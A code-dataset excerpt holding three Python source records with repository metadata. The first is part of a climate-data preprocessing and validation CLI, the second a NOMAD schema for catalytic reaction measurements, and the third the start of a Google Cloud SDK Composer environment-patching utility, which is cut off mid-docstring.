os.path.join(os.getenv(\"DERIVED_DATA\"), \"moose\")\n\n collection = CollectionOption(config[\"sources\"][\"collection\"])\n\n variable_resolution = get_variable_resolution(config, collection)\n\n ds = get_sources(\n config,\n collection,\n year,\n data_basedir,\n domain,\n target_size,\n variable_resolution,\n target_resolution,\n ensemble_member=ensemble_member,\n )\n\n for job_spec in config[\"spec\"]:\n if job_spec[\"action\"] == \"sum\":\n logger.info(f\"Summing {job_spec['params']['variables']}\")\n ds = Sum(**job_spec[\"params\"]).run(ds)\n ds[config[\"variable\"]] = ds[config[\"variable\"]].assign_attrs(\n config[\"attrs\"]\n )\n elif job_spec[\"action\"] == \"diff\":\n logger.info(\n f\"Difference between {job_spec['params']['left']} and {job_spec['params']['right']}\"\n )\n ds = Diff(**job_spec[\"params\"]).run(ds)\n ds[config[\"variable\"]] = ds[config[\"variable\"]].assign_attrs(\n config[\"attrs\"]\n )\n elif job_spec[\"action\"] == \"coarsen\":\n if scale_factor == \"gcm\":\n typer.echo(f\"Remapping conservatively to gcm grid...\")\n variable_resolution = f\"{variable_resolution}-coarsened-gcm\"\n # pick the target grid based on the job spec\n # some variables use one grid, others a slightly offset one\n grid_type = job_spec[\"parameters\"][\"grid\"]\n target_grid_filepath = os.path.join(\n os.path.dirname(__file__),\n \"..\",\n \"target-grids\",\n \"60km\",\n \"global\",\n grid_type,\n \"moose_grid.nc\",\n )\n ds = Remapcon(target_grid_filepath).run(ds)\n else:\n scale_factor = int(scale_factor)\n if scale_factor == 1:\n typer.echo(\n f\"{scale_factor}x coarsening scale factor, nothing to do...\"\n )\n else:\n typer.echo(f\"Coarsening {scale_factor}x...\")\n variable_resolution = (\n f\"{variable_resolution}-coarsened-{scale_factor}x\"\n )\n ds, orig_ds = Coarsen(scale_factor=scale_factor).run(ds)\n elif job_spec[\"action\"] == \"shift_lon_break\":\n ds = ShiftLonBreak().run(ds)\n elif job_spec[\"action\"] == \"regrid_to_target\":\n if target_resolution != variable_resolution:\n typer.echo(f\"Regridding to target resolution...\")\n target_grid_filepath = os.path.join(\n os.path.dirname(__file__),\n \"..\",\n \"target-grids\",\n target_resolution,\n \"uk\",\n \"moose_grid.nc\",\n )\n kwargs = job_spec.get(\"parameters\", {})\n ds = Regrid(\n target_grid_filepath, variables=[config[\"variable\"]], **kwargs\n ).run(ds)\n elif job_spec[\"action\"] == \"vorticity\":\n typer.echo(f\"Computing vorticity...\")\n ds = Vorticity(**job_spec[\"parameters\"]).run(ds)\n elif job_spec[\"action\"] == \"select-subdomain\":\n typer.echo(f\"Select {domain.value} subdomain...\")\n ds = SelectDomain(subdomain=domain.value, size=target_size).run(ds)\n elif job_spec[\"action\"] == \"constrain\":\n typer.echo(f\"Filtering...\")\n ds = Constrain(query=job_spec[\"query\"]).run(ds)\n elif job_spec[\"action\"] == \"rename\":\n typer.echo(f\"Renaming...\")\n ds = ds.rename(job_spec[\"mapping\"])\n else:\n raise f\"Unknown action {job_spec['action']}\"\n\n assert len(ds.grid_latitude) == target_size\n assert len(ds.grid_longitude) == target_size\n\n # there should be no missing values in this dataset\n assert ds[config[\"variable\"]].isnull().sum().values.item() == 0\n\n output_metadata = VariableMetadata(\n data_basedir,\n frequency=frequency,\n domain=f\"{domain.value}-{target_size}\",\n resolution=f\"{variable_resolution}-{target_resolution}\",\n ensemble_member=ensemble_member,\n variable=config[\"variable\"],\n )\n\n logger.info(f\"Saving data to {output_metadata.filepath(year)}\")\n os.makedirs(output_metadata.dirpath(), exist_ok=True)\n ds.to_netcdf(output_metadata.filepath(year))\n with open(\n os.path.join(output_metadata.dirpath(), f\"{config['variable']}-{year}.yml\"), \"w\"\n ) as f:\n yaml.dump(config, f)\n\n\ndef run_cmd(cmd):\n logger.debug(f\"Running {cmd}\")\n output = subprocess.run(cmd, capture_output=True, check=False)\n stdout = output.stdout.decode(\"utf8\")\n print(stdout)\n print(output.stderr.decode(\"utf8\"))\n output.check_returncode()\n\n\n@app.command()\n@Timer(name=\"xfer-variable\", text=\"{name}: {minutes:.1f} minutes\", logger=logger.info)\ndef xfer(\n variable: str = typer.Option(...),\n year: int = typer.Option(...),\n ensemble_member: str = typer.Option(...),\n frequency: str = \"day\",\n domain: DomainOption = DomainOption.london,\n collection: CollectionOption = typer.Option(...),\n resolution: str = typer.Option(...),\n target_size: int = 64,\n):\n # TODO re-write xfer in Python\n jasmin_filepath = processed_nc_filepath(\n variable=variable,\n year=year,\n frequency=frequency,\n domain=f\"{domain.value}-{target_size}\",\n resolution=resolution,\n collection=collection.value,\n ensemble_member=ensemble_member,\n )\n bp_filepath = processed_nc_filepath(\n variable=variable,\n year=year,\n frequency=frequency,\n domain=f\"{domain.value}-{target_size}\",\n resolution=resolution,\n collection=collection.value,\n base_dir=\"/user/work/vf20964\",\n ensemble_member=ensemble_member,\n )\n\n file_xfer_cmd = [\n f\"{os.getenv('HOME')}/code/mlde-data/moose-etl/xfer-script-direct\",\n jasmin_filepath,\n bp_filepath,\n ]\n # TODO: also transfer to config used for the variable\n # config_xfer_cmd = []\n run_cmd(file_xfer_cmd)\n\n\n@app.command()\ndef validate(\n variable: str = typer.Argument(\"all\"), ensemble_member: str = typer.Argument(\"all\")\n):\n domain_res_vars = {\n \"birmingham-64\": {\n \"2.2km-coarsened-gcm-2.2km-coarsened-4x\": [\n \"psl\",\n # \"tempgrad500250\",\n # \"tempgrad700500\",\n # \"tempgrad850700\",\n # \"tempgrad925850\",\n \"vorticity250\",\n \"vorticity500\",\n \"vorticity700\",\n \"vorticity850\",\n \"vorticity925\",\n \"spechum250\",\n \"spechum500\",\n \"spechum700\",\n \"spechum850\",\n \"spechum925\",\n \"temp250\",\n \"temp500\",\n \"temp700\",\n \"temp850\",\n \"temp925\",\n # \"pr\",\n \"linpr\",\n ],\n \"2.2km-coarsened-4x-2.2km-coarsened-4x\": [\n \"pr\",\n ],\n \"60km-2.2km-coarsened-4x\": [\n \"psl\",\n # \"tempgrad500250\",\n # \"tempgrad700500\",\n # \"tempgrad850700\",\n # \"tempgrad925850\",\n \"vorticity250\",\n \"vorticity500\",\n \"vorticity700\",\n \"vorticity850\",\n \"vorticity925\",\n \"spechum250\",\n \"spechum500\",\n \"spechum700\",\n \"spechum850\",\n \"spechum925\",\n \"temp250\",\n \"temp500\",\n \"temp700\",\n \"temp850\",\n \"temp925\",\n \"linpr\",\n \"pr\",\n ],\n },\n }\n\n years = list(range(1981, 2001)) + list(range(2021, 2041)) + list(range(2061, 2081))\n\n ensemble_members = [\n \"01\",\n \"04\",\n \"05\",\n \"06\",\n \"07\",\n \"08\",\n \"09\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"15\",\n ]\n\n for domain, res_variables in domain_res_vars.items():\n for res, variables in res_variables.items():\n for em in ensemble_members:\n if (ensemble_member != \"all\") and (ensemble_member != em):\n continue\n for var in variables:\n if (variable != \"all\") and (variable != var):\n continue\n sys.stdout.write(\"\\033[K\")\n print(\n f\"Checking {var} of {em} over {domain} at {res}\",\n end=\"\\r\",\n )\n\n bad_years = defaultdict(set)\n for year in years:\n var_meta = VariableMetadata(\n os.getenv(\"MOOSE_DERIVED_DATA\"),\n variable=var,\n frequency=\"day\",\n domain=domain,\n resolution=res,\n ensemble_member=em,\n )\n\n try:\n ds = xr.load_dataset(var_meta.filepath(year))\n except FileNotFoundError:\n bad_years[\"no file\"].add(year)\n continue\n\n nan_count = ds[var].isnull().sum().values.item()\n\n if nan_count > 0:\n bad_years[\"NaNs\"].add(year)\n\n # check dims\n if list(ds[var].dims) != [\n \"time\",\n \"grid_latitude\",\n \"grid_longitude\",\n ]:\n bad_years[\"bad dimensions\"].add(year)\n\n # check for forecast related metadata (should have been stripped)\n for v in ds.variables:\n if \"coordinates\" in ds[v].encoding and (\n re.match(\n \"(realization|forecast_period|forecast_reference_time) ?\",\n ds[v].encoding[\"coordinates\"],\n )\n is not None\n ):\n bad_years[\"forecast_encoding\"].add(year)\n if v in [\n \"forecast_period\",\n \"forecast_reference_time\",\n \"realization\",\n \"forecast_period_bnds\",\n ]:\n bad_years[\"forecast_vars\"].add(year)\n\n # check for pressure related metadata (should have been stripped)\n for v in ds.variables:\n if \"coordinates\" in ds[v].encoding and (\n re.match(\"(pressure) ?\", ds[v].encoding[\"coordinates\"])\n is not None\n ):\n bad_years[\"pressure_encoding\"].add(year)\n if v in [\"pressure\"]:\n bad_years[\"pressure_vars\"].add(year)\n\n # report findings\n for reason, error_years in bad_years.items():\n if len(error_years) > 0:\n print(\n f\"Failed '{reason}': {var} over {domain} of {em} at {res} for {len(error_years)}\\n{sorted(error_years)}\"\n )\n", "repo_name": "henryaddison/mlde-data", "sub_path": "src/mlde_data/bin/variable.py", "file_name": "variable.py", "file_ext": "py", "file_size_in_byte": 17908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 34, "usage_type": "attribute"}, {"api_name": "typer.Typer", "line_number": 36, "usage_type": "call"}, {"api_name": "options.CollectionOption.cpm", "line_number": 46, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 46, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 48, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 48, "usage_type": "name"}, {"api_name": "options.CollectionOption.cpm", "line_number": 54, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 54, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 56, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 56, "usage_type": "name"}, {"api_name": "options.CollectionOption.cpm", "line_number": 78, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 78, "usage_type": "name"}, {"api_name": "options.CollectionOption.gcm", "line_number": 80, "usage_type": "attribute"}, {"api_name": "options.CollectionOption", "line_number": 80, "usage_type": "name"}, {"api_name": "moose.raw_nc_filepath", "line_number": 91, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 101, "usage_type": "call"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 103, "usage_type": "name"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 105, "usage_type": "name"}, {"api_name": "moose.VARIABLE_CODES", "line_number": 109, "usage_type": "name"}, {"api_name": "moose.remove_forecast", "line_number": 116, "usage_type": "call"}, {"api_name": "moose.remove_pressure", "line_number": 118, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 123, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 133, "usage_type": "call"}, {"api_name": "moose.remove_pressure", "line_number": 135, "usage_type": "call"}, {"api_name": "xarray.combine_by_coords", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 157, "usage_type": "name"}, {"api_name": "options.DomainOption", "line_number": 160, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 157, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 158, "usage_type": "call"}, {"api_name": "options.DomainOption.london", "line_number": 160, "usage_type": "attribute"}, {"api_name": "typer.Option", "line_number": 162, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 165, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 182, "usage_type": "call"}, {"api_name": "options.CollectionOption", "line_number": 184, "usage_type": "call"}, {"api_name": "preprocessing.sum.Sum", "line_number": 203, "usage_type": "call"}, {"api_name": "preprocessing.diff.Diff", "line_number": 211, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "preprocessing.remapcon.Remapcon", "line_number": 231, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 235, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 239, "usage_type": "call"}, {"api_name": "preprocessing.coarsen.Coarsen", "line_number": 243, "usage_type": "call"}, {"api_name": "preprocessing.shift_lon_break.ShiftLonBreak", "line_number": 245, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 249, "usage_type": "call"}, {"api_name": "os.path", "line_number": 249, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path", "line_number": 250, "usage_type": "attribute"}, {"api_name": "preprocessing.regrid.Regrid", "line_number": 258, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 262, "usage_type": "call"}, {"api_name": "preprocessing.vorticity.Vorticity", "line_number": 263, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 265, "usage_type": "call"}, {"api_name": "preprocessing.select_domain.SelectDomain", "line_number": 266, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 268, "usage_type": "call"}, {"api_name": "preprocessing.constrain.Constrain", "line_number": 269, "usage_type": "call"}, {"api_name": "typer.echo", "line_number": 271, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 282, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 297, "usage_type": "call"}, {"api_name": "codetiming.Timer", "line_number": 155, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 302, "usage_type": "call"}, {"api_name": "options.DomainOption", "line_number": 316, "usage_type": "name"}, {"api_name": "options.CollectionOption", "line_number": 317, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 312, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 313, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 314, "usage_type": "call"}, {"api_name": "options.DomainOption.london", "line_number": 316, "usage_type": "attribute"}, {"api_name": "typer.Option", "line_number": 317, "usage_type": "call"}, {"api_name": "typer.Option", "line_number": 318, "usage_type": "call"}, {"api_name": "moose.processed_nc_filepath", "line_number": 322, "usage_type": "call"}, {"api_name": "moose.processed_nc_filepath", "line_number": 331, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 343, "usage_type": "call"}, {"api_name": "codetiming.Timer", "line_number": 310, "usage_type": "call"}, {"api_name": "typer.Argument", "line_number": 354, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 437, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 437, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 443, "usage_type": "call"}, {"api_name": "mlde_utils.VariableMetadata", "line_number": 445, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 446, "usage_type": "call"}, {"api_name": "xarray.load_dataset", "line_number": 455, "usage_type": "call"}, {"api_name": "re.match", "line_number": 476, "usage_type": "call"}, {"api_name": "re.match", "line_number": 494, "usage_type": "call"}]} +{"seq_id": "6323925346", "text": "import numpy as np\nimport os\n\nfrom nomad.metainfo import (Quantity, SubSection, Section)\nfrom nomad.datamodel.data import ArchiveSection\n\nfrom .. import MeasurementOnSample\n\n\nclass Reactant(ArchiveSection):\n m_def = Section(label_quantity='name')\n name = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n amount = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n\nclass Feed(ArchiveSection):\n m_def = Section(a_plot=[\n {\n \"label\": \"Feed\", 'x': 'runs', 'y': ['reactants/:/amount'],\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}}])\n flow_volume = Quantity(\n type=np.dtype(\n np.float64), shape=['*'], unit='ml/minute')\n runs = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n reactants = SubSection(section_def=Reactant, repeats=True)\n\n\nclass Product(ArchiveSection):\n\n m_def = Section(label_quantity='name')\n name = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n exchange = Quantity(type=np.dtype(np.float64), shape=['*'])\n selectivity = Quantity(type=np.dtype(np.float64), shape=['*'])\n relative_rate = Quantity(type=np.dtype(np.float64), shape=['*'])\n absolute_rate = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n\nclass CatalyticReactionData(ArchiveSection):\n m_def = Section(a_plot=[\n {\n \"label\": \"Relative exchange rate\",\n 'x': 'runs',\n 'y': 'products/:/relative_rate',\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}},\n {\n \"label\": \"Selectivity\",\n 'x': 'runs',\n 'y': ['c_balance', 'products/:/selectivity'],\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}},\n {\n \"label\": \"Exchange \",\n 'x': 'runs',\n 'y': 'products/:/exchange',\n 'layout': {\"showlegend\": True,\n 'yaxis': {\n \"fixedrange\": False}, 'xaxis': {\n \"fixedrange\": False}}, \"config\": {\n \"editable\": True, \"scrollZoom\": True}}\n ]\n )\n\n temperature = Quantity(\n type=np.dtype(\n np.float64), shape=['*'], unit='°C')\n\n c_balance = Quantity(\n type=np.dtype(\n np.float64), shape=['*'])\n\n runs = Quantity(type=np.dtype(np.float64), shape=['*'])\n\n products = SubSection(section_def=Product, repeats=True)\n\n\nclass CatalyticReaction(MeasurementOnSample):\n\n reaction = Quantity(type=str, a_eln=dict(component='StringEditQuantity'))\n\n data_file = Quantity(\n type=str,\n a_eln=dict(component='FileEditQuantity'),\n a_browser=dict(adaptor='RawFileAdaptor'))\n\n feed = SubSection(section_def=Feed)\n data = SubSection(section_def=CatalyticReactionData)\n\n def normalize(self, archive, logger):\n super(CatalyticReaction, self).normalize(archive, logger)\n self.method = \"Catalytic Reaction\"\n\n if not self.data_file or os.path.splitext(\n self.data_file)[-1] != \".csv\":\n return\n\n with archive.m_context.raw_file(self.data_file) as f:\n import pandas as pd\n data = pd.read_csv(f.name).dropna(axis=1, how='all')\n feed = Feed()\n cat_data = CatalyticReactionData()\n reactants = []\n products = []\n number_of_runs = 0\n for col in data.columns:\n\n if len(data[col]) < 1:\n continue\n col_split = col.split(\" \")\n if len(col_split) < 2:\n continue\n\n if len(data[col]) > number_of_runs:\n number_of_runs = len(data[col])\n\n if col_split[0] == \"x\":\n reactant = Reactant(name=col_split[1],\n amount=data[col])\n reactants.append(reactant)\n if col_split[0] == \"temperature\":\n cat_data.temperature = data[col]\n\n if col_split[0] == \"C-balance\":\n cat_data.c_balance = data[col]\n\n if col_split[0] == \"GHSV\":\n feed.flow_volume = data[col]\n\n if len(col_split) < 3 or col_split[2] != '(%)':\n continue\n\n product = Product(name=col_split[1])\n for i, p in enumerate(products):\n if p.name == col_split[1]:\n product = products.pop(i)\n break\n\n products.append(product)\n\n if col_split[0] == \"x_p\":\n product.exchange = data[col]\n\n if col_split[0] == \"S_p\":\n product.selectivity = data[col]\n\n if col_split[0] == \"x_r\":\n product.relative_rate = data[col]\n\n if col_split[0] == \"r\":\n product.absolute_rate = data[col]\n\n for p in products:\n if p.exchange is None or len(p.exchange) == 0:\n p.exchange = number_of_runs * [0]\n if p.selectivity is None or len(p.selectivity) == 0:\n p.selectivity = number_of_runs * [0]\n if p.relative_rate is None or len(p.relative_rate) == 0:\n p.relative_rate = number_of_runs * [0]\n if p.absolute_rate is None or len(p.absolute_rate) == 0:\n p.absolute_rate = number_of_runs * [0]\n\n feed.reactants = reactants\n feed.runs = np.linspace(0, number_of_runs - 1, number_of_runs)\n cat_data.products = products\n cat_data.runs = np.linspace(0, number_of_runs - 1, number_of_runs)\n\n self.feed = feed\n self.data = cat_data\n", "repo_name": "RoteKekse/nomad-baseclasses", "sub_path": "baseclasses/heterogeneous_catalysis/catalytic_measurement.py", "file_name": "catalytic_measurement.py", "file_ext": "py", "file_size_in_byte": 6111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 10, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 11, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 12, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 17, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 18, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 28, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 29, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 31, "usage_type": "call"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 34, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 36, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 37, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 39, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 40, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 42, "usage_type": "attribute"}, {"api_name": "nomad.datamodel.data.ArchiveSection", "line_number": 45, "usage_type": "name"}, {"api_name": "nomad.metainfo.Section", "line_number": 46, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 79, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.dtype", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 85, "usage_type": "attribute"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 87, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 92, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 94, "usage_type": "call"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 99, "usage_type": "call"}, {"api_name": "nomad.metainfo.SubSection", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 178, "usage_type": "call"}]} +{"seq_id": "5288966607", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.composer import environments_util as environments_api_util\nfrom googlecloudsdk.api_lib.composer import operations_util as operations_api_util\nfrom googlecloudsdk.api_lib.composer import util as api_util\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.command_lib.composer import util as command_util\nfrom googlecloudsdk.core import log\nimport six\n\n\ndef Patch(env_resource,\n field_mask,\n patch,\n is_async,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Patches an Environment, optionally waiting for the operation to complete.\n\n This function is intended to perform the common work of an Environment\n patching command's Run method. That is, calling the patch API method and\n waiting for the result or immediately returning the Operation.\n\n Args:\n env_resource: googlecloudsdk.core.resources.Resource, Resource representing\n the Environment to be patched\n field_mask: str, a field mask string containing comma-separated paths to be\n patched\n patch: Environment, a patch Environment containing updated values to apply\n is_async: bool, whether or not to perform the patch asynchronously\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n an Operation corresponding to the Patch call if `is_async` is True;\n otherwise None is returned after the operation is complete\n\n Raises:\n command_util.Error: if `is_async` is False and the operation encounters\n an error\n \"\"\"\n operation = environments_api_util.Patch(\n env_resource, patch, field_mask, release_track=release_track)\n details = 'with operation [{0}]'.format(operation.name)\n if is_async:\n log.UpdatedResource(\n env_resource.RelativeName(),\n kind='environment',\n is_async=True,\n details=details)\n return operation\n\n try:\n operations_api_util.WaitForOperation(\n operation,\n 'Waiting for [{}] to be updated with [{}]'.format(\n env_resource.RelativeName(), operation.name),\n release_track=release_track)\n except command_util.Error as e:\n raise command_util.Error('Error updating [{}]: {}'.format(\n env_resource.RelativeName(), six.text_type(e)))\n\n\ndef ConstructPatch(env_ref=None,\n node_count=None,\n update_pypi_packages_from_file=None,\n clear_pypi_packages=None,\n remove_pypi_packages=None,\n update_pypi_packages=None,\n clear_labels=None,\n remove_labels=None,\n update_labels=None,\n clear_airflow_configs=None,\n remove_airflow_configs=None,\n update_airflow_configs=None,\n clear_env_variables=None,\n remove_env_variables=None,\n update_env_variables=None,\n update_image_version=None,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch.\n\n Args:\n env_ref: resource argument, Environment resource argument for environment\n being updated.\n node_count: int, the desired node count\n update_pypi_packages_from_file: str, path to local requirements file\n containing desired pypi dependencies.\n clear_pypi_packages: bool, whether to uninstall all PyPI packages.\n remove_pypi_packages: iterable(string), Iterable of PyPI packages to\n uninstall.\n update_pypi_packages: {string: string}, dict mapping PyPI package name to\n extras and version specifier.\n clear_labels: bool, whether to clear the labels dictionary.\n remove_labels: iterable(string), Iterable of label names to remove.\n update_labels: {string: string}, dict of label names and values to set.\n clear_airflow_configs: bool, whether to clear the Airflow configs\n dictionary.\n remove_airflow_configs: iterable(string), Iterable of Airflow config\n property names to remove.\n update_airflow_configs: {string: string}, dict of Airflow config property\n names and values to set.\n clear_env_variables: bool, whether to clear the environment variables\n dictionary.\n remove_env_variables: iterable(string), Iterable of environment variables\n to remove.\n update_env_variables: {string: string}, dict of environment variable\n names and values to set.\n update_image_version: string, image version to use for environment upgrade\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n\n Raises:\n command_util.Error: if no update type is specified\n \"\"\"\n if node_count:\n return _ConstructNodeCountPatch(node_count, release_track=release_track)\n if update_pypi_packages_from_file:\n return _ConstructPyPiPackagesPatch(\n True, [],\n command_util.ParseRequirementsFile(update_pypi_packages_from_file),\n release_track=release_track)\n if clear_pypi_packages or remove_pypi_packages or update_pypi_packages:\n return _ConstructPyPiPackagesPatch(\n clear_pypi_packages,\n remove_pypi_packages,\n update_pypi_packages,\n release_track=release_track)\n if clear_labels or remove_labels or update_labels:\n return _ConstructLabelsPatch(\n clear_labels, remove_labels, update_labels, release_track=release_track)\n if (clear_airflow_configs or remove_airflow_configs or\n update_airflow_configs):\n return _ConstructAirflowConfigsPatch(\n clear_airflow_configs,\n remove_airflow_configs,\n update_airflow_configs,\n release_track=release_track)\n if clear_env_variables or remove_env_variables or update_env_variables:\n return _ConstructEnvVariablesPatch(\n env_ref,\n clear_env_variables,\n remove_env_variables,\n update_env_variables,\n release_track=release_track)\n if update_image_version:\n return _ConstructImageVersionPatch(\n update_image_version, release_track=release_track)\n raise command_util.Error(\n 'Cannot update Environment with no update type specified.')\n\n\ndef _ConstructNodeCountPatch(node_count, release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for node count.\n\n Args:\n node_count: int, the desired node count\n release_track: base.ReleaseTrack, the release track of command. Will dictate\n which Composer client library will be used.\n\n Returns:\n (str, Environment), the field mask and environment to use for update.\n \"\"\"\n messages = api_util.GetMessagesModule(release_track=release_track)\n config = messages.EnvironmentConfig(nodeCount=node_count)\n return 'config.node_count', messages.Environment(config=config)\n\n\ndef _ConstructPyPiPackagesPatch(clear_pypi_packages,\n remove_pypi_packages,\n update_pypi_packages,\n release_track=base.ReleaseTrack.GA):\n \"\"\"Constructs an environment patch for partially updating PyPI packages.\n\n Args:\n clear_pypi_packages: bool, whether to clear the PyPI packages dictionary.\n remove_pypi_packages: iterable(string), Iterable of PyPI package names to\n remove.\n update_pypi_packages: {string: string}, dict mapping PyPI package name\n to optional extras 